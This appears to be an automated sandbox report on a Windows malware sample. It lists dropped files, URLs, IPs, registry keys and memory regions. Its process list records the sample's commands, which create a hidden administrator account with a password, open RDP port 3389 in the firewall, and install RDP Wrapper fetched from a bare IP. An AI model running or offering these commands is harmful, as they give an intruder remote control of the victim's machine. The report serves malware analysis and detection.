Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
hloRQZmlfg.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Program Files\RDP Wrapper\rdpwrap.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_hloRQZmlfg.exe_e14f1ae934bde6c6503b1e1bfaf2ffefa86c324_8c8de2e2_89409a0e-f3ad-4606-acec-29704ed3c812\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\RDPWInst.exe
|
PE32 executable (console) Intel 80386, for MS Windows
|
modified
|
|
|
|
C:\Program Files\RDP Wrapper\rdpwrap.ini
|
Generic INItialization configuration [SLPolicy]
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER91CD.tmp.dmp
|
Mini DuMP crash report, 15 streams, Tue Oct 8 01:23:44 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER93C2.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9597.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\System32\rfxvmt.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
\Device\Mup\226546*\MAILSLOT\NET\NETLOGON
|
data
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\hloRQZmlfg.exe
|
"C:\Users\user\Desktop\hloRQZmlfg.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /c net user
|
|
|
|
C:\Windows\SysWOW64\net.exe
|
net user
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
|
|
|
|
C:\Users\user\AppData\Local\Temp\RDPWInst.exe
|
C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
|
|
|
|
C:\Windows\System32\netsh.exe
|
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /c net user RDPUser_1e47a393 GEdtvn58rfdr /add
|
|
|
|
C:\Windows\SysWOW64\net.exe
|
net user RDPUser_1e47a393 GEdtvn58rfdr /add
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /c net localgroup
|
|
|
|
C:\Windows\SysWOW64\net.exe
|
net localgroup
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
|
|
|
|
C:\Windows\SysWOW64\netsh.exe
|
netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /c net localgroup "Administrators" RDPUser_1e47a393 /add
|
|
|
|
C:\Windows\SysWOW64\net.exe
|
net localgroup "Administrators" RDPUser_1e47a393 /add
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\net1.exe
|
C:\Windows\system32\net1 user
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\drivers\rdpvideominiport.sys
|
|||
|
C:\Windows\System32\drivers\rdpdr.sys
|
|||
|
C:\Windows\System32\drivers\tsusbhub.sys
|
|||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\net1.exe
|
C:\Windows\system32\net1 user RDPUser_1e47a393 GEdtvn58rfdr /add
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\net1.exe
|
C:\Windows\system32\net1 localgroup
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\net1.exe
|
C:\Windows\system32\net1 localgroup "Administrators" RDPUser_1e47a393 /add
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 2756
|
There are 18 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://stascorp.com/load/1-1-0-62
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
|
147.45.44.104
|
||
|
http://api.ipify.orgd
|
unknown
|
||
|
http://stascorp.comDVarFileInfo$
|
unknown
|
||
|
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
|
unknown
|
||
|
http://hansgborn.eu
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/
|
unknown
|
||
|
https://github.com/lontivero/Open.Nat/issuesOAlso
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/envelope/
|
unknown
|
||
|
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
|
unknown
|
||
|
http://api.ipify.org/
|
104.26.12.205
|
||
|
https://hansgborn.eu/receive.phpd
|
unknown
|
||
|
http://hansgborn.eud
|
unknown
|
||
|
http://upx.sf.net
|
unknown
|
||
|
http://147.45.44.104
|
unknown
|
||
|
https://hansgborn.eu/receive.php
|
188.114.96.3
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://hansgborn.eu
|
unknown
|
||
|
http://api.ipify.org
|
unknown
|
There are 11 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
hansgborn.eu
|
188.114.96.3
|
||
|
api.ipify.org
|
104.26.12.205
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
8.46.123.33
|
unknown
|
United States
|
|
|
|
104.26.12.205
|
api.ipify.org
|
United States
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
188.114.96.3
|
hansgborn.eu
|
European Union
|
||
|
147.45.44.104
|
unknown
|
Russian Federation
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core
|
EnableConcurrentSessions
|
|
|
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters
|
ServiceDll
|
|
|
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server
|
fDenyTSConnections
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hloRQZmlfg_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hloRQZmlfg_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hloRQZmlfg_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hloRQZmlfg_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hloRQZmlfg_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hloRQZmlfg_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hloRQZmlfg_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hloRQZmlfg_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hloRQZmlfg_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hloRQZmlfg_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hloRQZmlfg_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hloRQZmlfg_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hloRQZmlfg_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hloRQZmlfg_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
AllowMultipleTSSessions
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{81c87465-de07-4efc-9d93-61e891d52fd2}
|
Class
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{81c87465-de07-4efc-9d93-61e891d52fd2}
|
NoDisplayClass
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{81c87465-de07-4efc-9d93-61e891d52fd2}
|
NoUseClass
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{81c87465-de07-4efc-9d93-61e891d52fd2}\Properties
|
Security
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{cc41eba2-ab57-4f4e-8c3d-1bc33b1e74e3}
|
Class
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{cc41eba2-ab57-4f4e-8c3d-1bc33b1e74e3}
|
NoDisplayClass
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{cc41eba2-ab57-4f4e-8c3d-1bc33b1e74e3}
|
NoUseClass
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{cc41eba2-ab57-4f4e-8c3d-1bc33b1e74e3}\Properties
|
Security
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{091bc97e-2352-4362-a539-10a6d8ff7596}
|
Class
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{091bc97e-2352-4362-a539-10a6d8ff7596}
|
NoDisplayClass
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{091bc97e-2352-4362-a539-10a6d8ff7596}
|
NoUseClass
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{091bc97e-2352-4362-a539-10a6d8ff7596}\Properties
|
Security
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{cc41eba2-ab57-4f4e-8c3d-1bc33b1e74e3}\Properties
|
Security
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf
|
WdfMajorVersion
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf
|
WdfMinorVersion
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{191a5137-7c9d-43c0-a943-de4411f424f7}\##?#TS_USB_HUB_Enumerator#UMB#2&30d3618&0&TS_USB_HUB#{191a5137-7c9d-43c0-a943-de4411f424f7}
|
DeviceInstance
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
ProgramId
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
FileId
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
LongPathHash
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
Name
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
OriginalFileName
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
Publisher
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
Version
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
BinFileVersion
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
BinaryType
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
ProductName
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
ProductVersion
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
LinkDate
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
BinProductVersion
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
Size
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
Language
|
||
|
\REGISTRY\A\{4e394f00-8a62-d5c6-a6ed-c22cf812bb03}\Root\InventoryApplicationFile\hlorqzmlfg.exe|601857e986b857a5
|
Usn
|
There are 44 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
882000
|
unkown
|
page readonly
|
|
|
|
450000
|
unkown
|
page readonly
|
|
|
|
450000
|
unkown
|
page readonly
|
|
|
|
2CF1000
|
trusted library allocation
|
page read and write
|
|
|
|
2CDE000
|
stack
|
page read and write
|
||
|
92D000
|
stack
|
page read and write
|
||
|
60CE000
|
stack
|
page read and write
|
||
|
5CDE000
|
stack
|
page read and write
|
||
|
7FE000
|
heap
|
page read and write
|
||
|
3227000
|
heap
|
page read and write
|
||
|
2DB5000
|
trusted library allocation
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
7F0000
|
heap
|
page read and write
|
||
|
577A000
|
heap
|
page read and write
|
||
|
5F0E000
|
stack
|
page read and write
|
||
|
30EE000
|
unkown
|
page read and write
|
||
|
63CD000
|
stack
|
page read and write
|
||
|
2720000
|
heap
|
page read and write
|
||
|
3555000
|
heap
|
page read and write
|
||
|
2ACF000
|
stack
|
page read and write
|
||
|
22D7000
|
direct allocation
|
page read and write
|
||
|
DED000
|
stack
|
page read and write
|
||
|
281E000
|
stack
|
page read and write
|
||
|
2E77000
|
heap
|
page read and write
|
||
|
E30000
|
heap
|
page read and write
|
||
|
92C000
|
stack
|
page read and write
|
||
|
6B80000
|
trusted library allocation
|
page read and write
|
||
|
2B9F000
|
stack
|
page read and write
|
||
|
5B1E000
|
stack
|
page read and write
|
||
|
29C0000
|
heap
|
page read and write
|
||
|
5792000
|
heap
|
page read and write
|
||
|
3660000
|
heap
|
page read and write
|
||
|
2BC1000
|
heap
|
page read and write
|
||
|
CF5000
|
stack
|
page read and write
|
||
|
2E21000
|
trusted library allocation
|
page read and write
|
||
|
2E2B000
|
trusted library allocation
|
page read and write
|
||
|
3208000
|
heap
|
page read and write
|
||
|
44D000
|
unkown
|
page write copy
|
||
|
6530000
|
heap
|
page read and write
|
||
|
285E000
|
stack
|
page read and write
|
||
|
22D0000
|
heap
|
page read and write
|
||
|
EB0000
|
trusted library allocation
|
page read and write
|
||
|
3250000
|
heap
|
page read and write
|
||
|
2BFE000
|
stack
|
page read and write
|
||
|
6A3E000
|
stack
|
page read and write
|
||
|
317E000
|
stack
|
page read and write
|
||
|
307E000
|
stack
|
page read and write
|
||
|
305D000
|
stack
|
page read and write
|
||
|
31B2000
|
heap
|
page read and write
|
||
|
2D40000
|
heap
|
page read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
7EE000
|
unkown
|
page read and write
|
||
|
863000
|
heap
|
page read and write
|
||
|
34AE000
|
stack
|
page read and write
|
||
|
EC2000
|
trusted library allocation
|
page read and write
|
||
|
2D9F000
|
trusted library allocation
|
page read and write
|
||
|
23AF000
|
direct allocation
|
page read and write
|
||
|
2300000
|
heap
|
page read and write
|
||
|
2F3D000
|
stack
|
page read and write
|
||
|
3480000
|
heap
|
page read and write
|
||
|
F5D000
|
heap
|
page read and write
|
||
|
5ADE000
|
stack
|
page read and write
|
||
|
32BC000
|
heap
|
page read and write
|
||
|
3258000
|
trusted library allocation
|
page read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
EB6000
|
trusted library allocation
|
page execute and read and write
|
||
|
524E000
|
stack
|
page read and write
|
||
|
7FD00000
|
direct allocation
|
page read and write
|
||
|
5833000
|
heap
|
page read and write
|
||
|
5836000
|
heap
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
32DD000
|
heap
|
page read and write
|
||
|
657D000
|
stack
|
page read and write
|
||
|
1FD000
|
stack
|
page read and write
|
||
|
75E000
|
stack
|
page read and write
|
||
|
2980000
|
trusted library allocation
|
page read and write
|
||
|
3491000
|
heap
|
page read and write
|
||
|
3FE000
|
stack
|
page read and write
|
||
|
5DDF000
|
stack
|
page read and write
|
||
|
38F5000
|
heap
|
page read and write
|
||
|
6B7C000
|
stack
|
page read and write
|
||
|
2E3D000
|
stack
|
page read and write
|
||
|
6EE000
|
stack
|
page read and write
|
||
|
5760000
|
heap
|
page read and write
|
||
|
E94000
|
trusted library allocation
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
236E000
|
direct allocation
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
5830000
|
heap
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
30D000
|
stack
|
page read and write
|
||
|
2AD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
64CD000
|
stack
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
67FC000
|
stack
|
page read and write
|
||
|
3668000
|
heap
|
page read and write
|
||
|
2C13000
|
heap
|
page read and write
|
||
|
2B08000
|
trusted library allocation
|
page read and write
|
||
|
6FD000
|
stack
|
page read and write
|
||
|
693E000
|
stack
|
page read and write
|
||
|
31FF000
|
stack
|
page read and write
|
||
|
EBA000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E09000
|
trusted library allocation
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
3220000
|
heap
|
page read and write
|
||
|
E90000
|
heap
|
page read and write
|
||
|
2E1F000
|
trusted library allocation
|
page read and write
|
||
|
5788000
|
heap
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
CE0000
|
heap
|
page read and write
|
||
|
2B9F000
|
unkown
|
page read and write
|
||
|
27DE000
|
stack
|
page read and write
|
||
|
5DF0000
|
trusted library allocation
|
page read and write
|
||
|
DE7000
|
heap
|
page read and write
|
||
|
238D000
|
stack
|
page read and write
|
||
|
38F0000
|
heap
|
page read and write
|
||
|
C90000
|
heap
|
page read and write
|
||
|
2280000
|
heap
|
page read and write
|
||
|
63D000
|
stack
|
page read and write
|
||
|
2500000
|
direct allocation
|
page read and write
|
||
|
E80000
|
trusted library allocation
|
page read and write
|
||
|
230D000
|
stack
|
page read and write
|
||
|
57EA000
|
heap
|
page read and write
|
||
|
32BE000
|
stack
|
page read and write
|
||
|
338F000
|
unkown
|
page read and write
|
||
|
51D000
|
stack
|
page read and write
|
||
|
E90000
|
trusted library allocation
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
E70000
|
heap
|
page read and write
|
||
|
9A5000
|
heap
|
page read and write
|
||
|
2E19000
|
trusted library allocation
|
page read and write
|
||
|
565D000
|
stack
|
page read and write
|
||
|
3677000
|
heap
|
page read and write
|
||
|
2375000
|
direct allocation
|
page read and write
|
||
|
315E000
|
unkown
|
page read and write
|
||
|
2E25000
|
trusted library allocation
|
page read and write
|
||
|
3355000
|
heap
|
page read and write
|
||
|
325E000
|
unkown
|
page read and write
|
||
|
11CF000
|
stack
|
page read and write
|
||
|
608E000
|
stack
|
page read and write
|
||
|
2DEF000
|
stack
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
445000
|
unkown
|
page write copy
|
||
|
2D47000
|
trusted library allocation
|
page read and write
|
||
|
2F80000
|
heap
|
page read and write
|
||
|
7F0000
|
heap
|
page read and write
|
||
|
323D000
|
stack
|
page read and write
|
||
|
6A0000
|
heap
|
page read and write
|
||
|
2B9F000
|
unkown
|
page read and write
|
||
|
2DCF000
|
trusted library allocation
|
page read and write
|
||
|
59DE000
|
stack
|
page read and write
|
||
|
44C000
|
unkown
|
page write copy
|
||
|
7FD70000
|
direct allocation
|
page read and write
|
||
|
CC0000
|
heap
|
page read and write
|
||
|
2AF0000
|
heap
|
page read and write
|
||
|
23E1000
|
direct allocation
|
page read and write
|
||
|
E77000
|
heap
|
page read and write
|
||
|
EDE000
|
heap
|
page read and write
|
||
|
ECB000
|
trusted library allocation
|
page execute and read and write
|
||
|
343D000
|
stack
|
page read and write
|
||
|
2E2D000
|
trusted library allocation
|
page read and write
|
||
|
A0E000
|
stack
|
page read and write
|
||
|
5C1E000
|
stack
|
page read and write
|
||
|
CE8000
|
heap
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
C9D000
|
stack
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
344E000
|
stack
|
page read and write
|
||
|
2858000
|
heap
|
page read and write
|
||
|
3135000
|
heap
|
page read and write
|
||
|
3495000
|
heap
|
page read and write
|
||
|
342E000
|
stack
|
page read and write
|
||
|
E7D000
|
stack
|
page read and write
|
||
|
E6D000
|
stack
|
page read and write
|
||
|
861000
|
heap
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
E2E000
|
stack
|
page read and write
|
||
|
E95000
|
heap
|
page read and write
|
||
|
3260000
|
heap
|
page read and write
|
||
|
29C5000
|
heap
|
page read and write
|
||
|
2660000
|
heap
|
page read and write
|
||
|
551D000
|
stack
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
27DF000
|
stack
|
page read and write
|
||
|
34D0000
|
heap
|
page read and write
|
||
|
667A000
|
stack
|
page read and write
|
||
|
865000
|
heap
|
page read and write
|
||
|
E93000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F5E000
|
stack
|
page read and write
|
||
|
2F20000
|
heap
|
page read and write
|
||
|
2392000
|
direct allocation
|
page read and write
|
||
|
29CE000
|
stack
|
page read and write
|
||
|
83E000
|
stack
|
page read and write
|
||
|
2E1D000
|
trusted library allocation
|
page read and write
|
||
|
5FE000
|
unkown
|
page read and write
|
||
|
24BB000
|
direct allocation
|
page read and write
|
||
|
2B15000
|
heap
|
page read and write
|
||
|
2FEE000
|
stack
|
page read and write
|
||
|
2F2E000
|
stack
|
page read and write
|
||
|
C5D000
|
stack
|
page read and write
|
||
|
2850000
|
heap
|
page read and write
|
||
|
3BE000
|
unkown
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
2E27000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
446000
|
unkown
|
page write copy
|
||
|
348F000
|
stack
|
page read and write
|
||
|
2E23000
|
trusted library allocation
|
page read and write
|
||
|
57A1000
|
heap
|
page read and write
|
||
|
352E000
|
stack
|
page read and write
|
||
|
3310000
|
heap
|
page read and write
|
||
|
2358000
|
direct allocation
|
page read and write
|
||
|
8FD000
|
stack
|
page read and write
|
||
|
84C000
|
heap
|
page read and write
|
||
|
870000
|
heap
|
page read and write
|
||
|
A3F000
|
unkown
|
page read and write
|
||
|
34A0000
|
heap
|
page read and write
|
||
|
3315000
|
heap
|
page read and write
|
||
|
347C000
|
heap
|
page read and write
|
||
|
7FA000
|
heap
|
page read and write
|
||
|
237C000
|
direct allocation
|
page read and write
|
||
|
30FF000
|
stack
|
page read and write
|
||
|
312E000
|
stack
|
page read and write
|
||
|
C10000
|
heap
|
page read and write
|
||
|
270E000
|
stack
|
page read and write
|
||
|
2E05000
|
trusted library allocation
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
EB2000
|
trusted library allocation
|
page read and write
|
||
|
22B4000
|
direct allocation
|
page read and write
|
||
|
EF7000
|
heap
|
page read and write
|
||
|
53DE000
|
stack
|
page read and write
|
||
|
23A8000
|
direct allocation
|
page read and write
|
||
|
CB0000
|
heap
|
page read and write
|
||
|
319F000
|
stack
|
page read and write
|
||
|
3530000
|
heap
|
page read and write
|
||
|
29CF000
|
stack
|
page read and write
|
||
|
577C000
|
heap
|
page read and write
|
||
|
238B000
|
direct allocation
|
page read and write
|
||
|
610E000
|
stack
|
page read and write
|
||
|
330E000
|
unkown
|
page read and write
|
||
|
2BFB000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
CA0000
|
heap
|
page read and write
|
||
|
5110000
|
trusted library allocation
|
page read and write
|
||
|
324E000
|
stack
|
page read and write
|
||
|
23E8000
|
direct allocation
|
page read and write
|
||
|
7FC20000
|
direct allocation
|
page read and write
|
||
|
2ACD000
|
stack
|
page read and write
|
||
|
F13000
|
heap
|
page read and write
|
||
|
2D9F000
|
stack
|
page read and write
|
||
|
5795000
|
heap
|
page read and write
|
||
|
9FE000
|
stack
|
page read and write
|
||
|
620F000
|
stack
|
page read and write
|
||
|
249C000
|
direct allocation
|
page read and write
|
||
|
2C11000
|
heap
|
page read and write
|
||
|
2C15000
|
heap
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
54DE000
|
stack
|
page read and write
|
||
|
366E000
|
stack
|
page read and write
|
||
|
5C9E000
|
stack
|
page read and write
|
||
|
599E000
|
stack
|
page read and write
|
||
|
990000
|
heap
|
page read and write
|
||
|
34AF000
|
stack
|
page read and write
|
||
|
AEF000
|
stack
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
2E3E000
|
stack
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
2CE0000
|
heap
|
page execute and read and write
|
||
|
347D000
|
stack
|
page read and write
|
||
|
5C5D000
|
stack
|
page read and write
|
||
|
EA0000
|
trusted library allocation
|
page read and write
|
||
|
329E000
|
stack
|
page read and write
|
||
|
44B000
|
unkown
|
page read and write
|
||
|
5140000
|
heap
|
page execute and read and write
|
||
|
3780000
|
heap
|
page read and write
|
||
|
2BFD000
|
stack
|
page read and write
|
||
|
2D37000
|
trusted library allocation
|
page read and write
|
||
|
6A7E000
|
stack
|
page read and write
|
||
|
302F000
|
stack
|
page read and write
|
||
|
2DF3000
|
trusted library allocation
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
2491000
|
direct allocation
|
page read and write
|
||
|
9A0000
|
heap
|
page read and write
|
||
|
